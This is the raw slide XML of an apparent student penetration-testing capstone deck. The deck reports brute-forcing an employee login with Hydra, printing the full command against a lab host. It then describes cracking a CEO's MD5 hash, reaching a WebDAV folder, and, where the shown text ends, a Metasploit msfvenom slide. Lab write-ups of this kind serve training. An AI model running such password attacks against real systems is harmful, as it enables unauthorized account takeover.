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Roboto Thin"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>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guide id="2" orient="horz" pos="223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63BDC58-2C87-4161-AF0D-D854A5650081}">
  <a:tblStyle styleId="{663BDC58-2C87-4161-AF0D-D854A565008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223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edium-italic.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><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RobotoLight-regular.fntdata"/><Relationship Id="rId45"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Light-italic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-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8798eb4c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8798eb4c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8623a2bef4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8623a2bef4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11ba510227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11ba510227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11ba510227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11ba510227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8798eb4c4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8798eb4c4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8623a2bef4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8623a2bef4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8623a2bef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8623a2bef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11bfcc6dc8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11bfcc6dc8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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8798eb4c4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8798eb4c4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8623a2bef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8623a2bef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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c4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8798eb4c4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8798eb4c4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g8798eb4c44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5" name="Google Shape;1295;g8798eb4c44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80f7e6291e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80f7e6291e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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8623a2bef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8623a2bef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8623a2bef4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8623a2bef4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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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8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5.pn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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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9.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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1.png"/><Relationship Id="rId4"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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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60.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.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100.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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7" name="Google Shape;447;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8" name="Google Shape;448;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0" name="Google Shape;450;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1" name="Google Shape;451;p26"/>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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="26883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a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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457" name="Shape 457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;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9" name="Google Shape;459;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0" name="Google Shape;460;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1" name="Google Shape;461;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3" name="Google Shape;463;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1" name="Google Shape;481;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3" name="Google Shape;483;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484"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8" name="Google Shape;488;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9" name="Google Shape;489;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1" name="Google Shape;491;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7" name="Google Shape;497;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8" name="Google Shape;498;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99" name="Google Shape;499;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03"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7" name="Google Shape;507;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8" name="Google Shape;508;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0" name="Google Shape;510;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 name="Google Shape;512;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 name="Google Shape;517;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18" name="Google Shape;518;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22"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6" name="Google Shape;526;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 name="Google Shape;530;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1" name="Google Shape;531;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37" name="Google Shape;537;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4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5" name="Google Shape;545;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4" name="Google Shape;554;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 name="Google Shape;555;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56" name="Google Shape;556;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560"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3" name="Google Shape;563;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4" name="Google Shape;564;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8" name="Google Shape;568;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9" name="Google Shape;569;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 name="Google Shape;573;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7" name="Google Shape;577;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582"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 name="Google Shape;585;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6" name="Google Shape;586;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87" name="Google Shape;587;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89" name="Google Shape;589;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0" name="Google Shape;590;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1" name="Google Shape;591;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6" name="Google Shape;596;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99" name="Google Shape;599;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04"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7" name="Google Shape;607;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8" name="Google Shape;608;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9" name="Google Shape;609;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1" name="Google Shape;611;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2" name="Google Shape;612;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3" name="Google Shape;613;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1" name="Google Shape;621;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26"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9" name="Google Shape;629;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0" name="Google Shape;630;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1" name="Google Shape;631;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3" name="Google Shape;633;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4" name="Google Shape;634;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3" name="Google Shape;643;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648"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1" name="Google Shape;651;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2" name="Google Shape;652;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3" name="Google Shape;653;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5" name="Google Shape;655;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7" name="Google Shape;667;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673"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6" name="Google Shape;67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7" name="Google Shape;67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8" name="Google Shape;678;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0" name="Google Shape;680;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2" name="Google Shape;692;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698"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2" name="Google Shape;702;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3" name="Google Shape;703;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5" name="Google Shape;705;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6" name="Google Shape;706;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7" name="Google Shape;717;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23"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6" name="Google Shape;726;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7" name="Google Shape;727;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8" name="Google Shape;728;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0" name="Google Shape;730;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1" name="Google Shape;731;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2" name="Google Shape;742;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748"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1" name="Google Shape;751;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2" name="Google Shape;752;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3" name="Google Shape;753;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5" name="Google Shape;755;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9" name="Google Shape;759;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1" name="Google Shape;761;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9" name="Google Shape;769;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776"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0" name="Google Shape;78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1" name="Google Shape;781;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3" name="Google Shape;783;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5" name="Google Shape;795;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7" name="Google Shape;797;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04"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7" name="Google Shape;80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8" name="Google Shape;80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9" name="Google Shape;809;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1" name="Google Shape;811;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2" name="Google Shape;812;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5" name="Google Shape;825;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32"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5" name="Google Shape;83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6" name="Google Shape;83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7" name="Google Shape;837;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9" name="Google Shape;839;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0" name="Google Shape;840;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1" name="Google Shape;851;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3" name="Google Shape;853;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860" name="Shape 860"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;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2" name="Google Shape;862;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3" name="Google Shape;863;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4" name="Google Shape;864;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6" name="Google Shape;866;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9" name="Google Shape;879;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3" name="Google Shape;883;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891" name="Shape 891"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;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4" name="Google Shape;894;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5" name="Google Shape;895;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7" name="Google Shape;897;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8" name="Google Shape;898;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8" name="Google Shape;908;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14" name="Google Shape;914;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22" name="Shape 922"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;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5" name="Google Shape;925;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6" name="Google Shape;926;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8" name="Google Shape;928;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9" name="Google Shape;929;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3" name="Google Shape;933;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7" name="Google Shape;937;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9" name="Google Shape;939;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1" name="Google Shape;941;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3" name="Google Shape;943;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5" name="Google Shape;945;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953" name="Shape 953"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;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6" name="Google Shape;956;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7" name="Google Shape;957;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9" name="Google Shape;959;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0" name="Google Shape;960;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4" name="Google Shape;964;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8" name="Google Shape;968;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0" name="Google Shape;970;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2" name="Google Shape;972;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4" name="Google Shape;974;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6" name="Google Shape;976;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984"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86" name="Google Shape;986;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7" name="Google Shape;987;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88" name="Google Shape;988;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992"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4" name="Google Shape;994;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998" name="Shape 998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;99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01" name="Shape 1001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;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1006"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1011" name="Shape 1011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;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5817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2.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hyperlink" Target="http://192.168.1.105/company_folders/secret" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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04.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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04.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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04.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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04.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0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0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0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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Desmond’s Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p5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Brute force attack (password cracking)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;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35" name="Google Shape;1135;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="1486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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="2371500" cy="11946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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Used the Kali Linux Brute forcing tool, ”Hydra” to crack an employee’s password.</a:t>
            </a:r>
            <a:endParaRPr sz="11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37" name="Google Shape;1137;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1138" name="Google Shape;1138;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39" name="Google Shape;1139;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0" name="Google Shape;1140;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1141" name="Google Shape;1141;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42" name="Google Shape;1142;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3" name="Google Shape;1143;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="25929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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2729700" cy="20628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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Running this command allowed our team to gain direct access to the employee, Ashton’s login credentials. The team discovered the CEO, Ryan’s password hash embedded in a .txt file. The team was able to decrypt Ryan’s password hash and utilize the credentials to gain access to his account.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1146" name="Google Shape;1146;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47" name="Google Shape;1147;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8" name="Google Shape;1148;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6267825" y="1481375"/>
            <a:ext cx="2428500" cy="17775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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="17775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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:endParaRPr b="1"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9900FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t># hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="16625" r="14361" t="76555"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3416825" y="3836750"/>
            <a:ext cx="5727175" cy="10799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Direct Open Access to VSI Server Directories</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p6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57" name="Google Shape;1157;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="16809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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="2371500" cy="18657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From the previous exploit where we gained access to two of the key employee’s login credentials we then were able to login to the “secret folder”.</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59" name="Google Shape;1159;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1160" name="Google Shape;1160;p64"/>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61" name="Google Shape;1161;p64"/>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2" name="Google Shape;1162;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1163" name="Google Shape;1163;p64"/>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64" name="Google Shape;1164;p64"/>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5" name="Google Shape;1165;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="19236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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="16809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The secret folder contained not only the CEO’s MD5 hash to is password but also exact instructions on where and how to login to the webdav folder were the TCP attack was carried out.</a:t>
            </a:r>
            <a:endParaRPr b="1"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67" name="Google Shape;1167;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1168" name="Google Shape;1168;p64"/>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69" name="Google Shape;1169;p64"/>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0" name="Google Shape;1170;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="16809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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481068"/>
            <a:ext cx="2371500" cy="19236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200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folders/secret</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 Led to the discovery of this location on the server:</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dav://192.168.1.105/webdav</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7911" l="573" r="563" t="7920"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137275" y="3346325"/>
            <a:ext cx="6777201" cy="1570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Metasploit msfvenom</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
